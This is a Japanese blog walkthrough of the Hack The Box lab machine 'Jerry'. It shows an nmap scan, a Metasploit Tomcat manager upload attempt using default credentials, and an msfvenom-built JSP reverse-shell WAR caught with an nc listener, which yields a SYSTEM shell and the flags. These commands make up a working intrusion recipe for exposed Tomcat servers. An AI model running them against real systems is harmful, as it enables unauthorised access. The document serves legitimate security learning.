Magicode logo
Magicode
0
14 min read

hack the box ~魔法使いへの道~ (その11) 【Walkthrough】Jerry

https://cdn.apollon.ai/media/notebox/566a5552-8928-4f3e-b42c-991c169d001e.jpeg

はじめに

ホワイトハッカーを目指したエンジニアの活動記録です. セキュリティ関連の知識ゼロですが,奮闘していきます.
前回の記事はこちら,Find The Easy Passを攻略しました*1
今回はBeginner TrackのJerryをこちらの記事*2*3*4を参考に攻略していきたいと思います.
file

nmap

まずはnmapで探索していきます.
┌──(maki㉿kali)-[~/Downloads/Weak RSA/RsaCtfTool-master/RsaCtfTool-master]
└─$ sudo nmap 10.10.10.95 -sC -sS -v -Pn
[sudo] password for maki: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-10 19:30 JST
NSE: Loaded 125 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:30
Completed NSE at 19:30, 0.00s elapsed
Initiating NSE at 19:30
Completed NSE at 19:30, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:30
Completed Parallel DNS resolution of 1 host. at 19:30, 0.02s elapsed
Initiating SYN Stealth Scan at 19:30
Scanning 10.10.10.95 [1000 ports]
Discovered open port 8080/tcp on 10.10.10.95
Completed SYN Stealth Scan at 19:30, 19.71s elapsed (1000 total ports)
NSE: Script scanning 10.10.10.95.
Initiating NSE at 19:30
Completed NSE at 19:30, 8.84s elapsed
Initiating NSE at 19:30
Completed NSE at 19:30, 0.00s elapsed
Nmap scan report for 10.10.10.95
Host is up (0.25s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE
8080/tcp open  http-proxy
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/7.0.88
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Apache Tomcat

NSE: Script Post-scanning.
Initiating NSE at 19:30
Completed NSE at 19:30, 0.00s elapsed
Initiating NSE at 19:30
Completed NSE at 19:30, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 29.22 seconds
           Raw packets sent: 2008 (88.352KB) | Rcvd: 10 (440B)

metasploitで攻撃

下記のようなプログラムを書いて
use exploit/multi/http/tomcat_mgr_upload

set HttpPassword s3cret
set HttpUsername tomcat

set RHOSTS 10.10.10.95
set RPORT 8080

set LHOST 10.10.14.2

exploit
攻撃してみます*2
┌──(maki㉿kali)-[~/Downloads/Weak RSA/RsaCtfTool-master/RsaCtfTool-master]
└─$ msfconsole -r jerry_hack.rc
                                                  

      .:okOOOkdc'           'cdkOOOko:.                                                                                                                                                      
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.                                                                                                                                                    
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:                                                                                                                                                   
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'                                                                                                                                                  
  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo                                                                                                                                                  
  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx                                                                                                                                                  
  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl                                                                                                                                                  
  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.                                                                                                                                                  
   cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc                                                                                                                                                   
    oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo                                                                                                                                                    
     lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl                                                                                                                                                     
      ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;                                                                                                                                                      
       .dOOo'WM.OOOOocccxOOOO.MX'xOOd.                                                                                                                                                       
         ,kOl'M.OOOOOOOOOOOOO.M'dOk,                                                                                                                                                         
           :kk;.OOOOOOOOOOOOO.;Ok:                                                                                                                                                           
             ;kOOOOOOOOOOOOOOOk:                                                                                                                                                             
               ,xOOOOOOOOOOOx,                                                                                                                                                               
                 .lOOOOOOOl.                                                                                                                                                                 
                    ,dOd,                                                                                                                                                                    
                      .                                                                                                                                                                      

       =[ metasploit v6.1.39-dev                          ]
+ -- --=[ 2214 exploits - 1171 auxiliary - 396 post       ]
+ -- --=[ 616 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use help <command> to learn more 
about any command

[*] Processing jerry_hack.rc for ERB directives.
resource (jerry_hack.rc)> use exploit/multi/http/tomcat_mgr_upload
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
resource (jerry_hack.rc)> set HttpPassword s3cret
HttpPassword => s3cret
resource (jerry_hack.rc)> set HttpUsername tomcat
HttpUsername => tomcat
resource (jerry_hack.rc)> set RHOSTS 10.10.10.95
RHOSTS => 10.10.10.95
resource (jerry_hack.rc)> set RPORT 8080
RPORT => 8080
resource (jerry_hack.rc)> set LHOST 10.0.2.15
LHOST => 10.0.2.15
resource (jerry_hack.rc)> exploit
[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying UUtHR0BJ...
[-] Exploit aborted due to failure: unknown: Upload failed
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/tomcat_mgr_upload) > use exploit/multi/http/tomcat_mgr_upload
[*] Using configured payload java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
HttpPassword => s3cret
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
HttpUsername => tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 10.10.10.95
RHOSTS => 10.10.10.95
msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set LHOST 10.10.14.2
LHOST => 10.10.14.2
msf6 exploit(multi/http/tomcat_mgr_upload) > exploit

[*] Started reverse TCP handler on 10.10.14.2:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying IcExZTZPUm3dLc8uPXGUmCvft0...
[-] Exploit aborted due to failure: unknown: Upload failed
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/tomcat_mgr_upload) > exit
しかし,うまくいきませんでした. 対策されている可能性が高いです.

リバースシェル

Apache Tomcatが8080ポートで開いているので,見に行きます*3*4
file
そうすると,このようなサイトがあります.
ここからログインでき,
file
この画面で数回ログインに失敗すると
file
ユーザー名とパスワードが記載されているページが表示されます.
file
相変わらずのガバガバセキュリティ!
ログインするとこんなページに遷移し,下のところにwarファイルをアップロードする場所があります.
file
こちらのコマンドでリバースシェルを作成します.
(base) ┌──(maki㉿kali-makiCh)-[~]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f war > shell3.war
Payload size: 1095 bytes
Final size of war file: 1095 bytes
これを先ほどの画面でアップロードするとこんな感じになります.
file
次に,ncコマンドで待機して,アップロードしたwarファイルを実行すると入れます.
(base) ┌──(maki㉿kali-makiCh)-[~]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.95] 49195
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88>type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"
type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"
user.txt
7004dbcef0f854*****************

root.txt
04a8b36e1545a4*****************
C:\apache-tomcat-7.0.88>
無事に,ユーザーフラグとルートフラグを取得できました.

おわりに

今回も無事に攻略できました. 次回からも奮っていきたいと思います.

Discussion

コメントにはログインが必要です。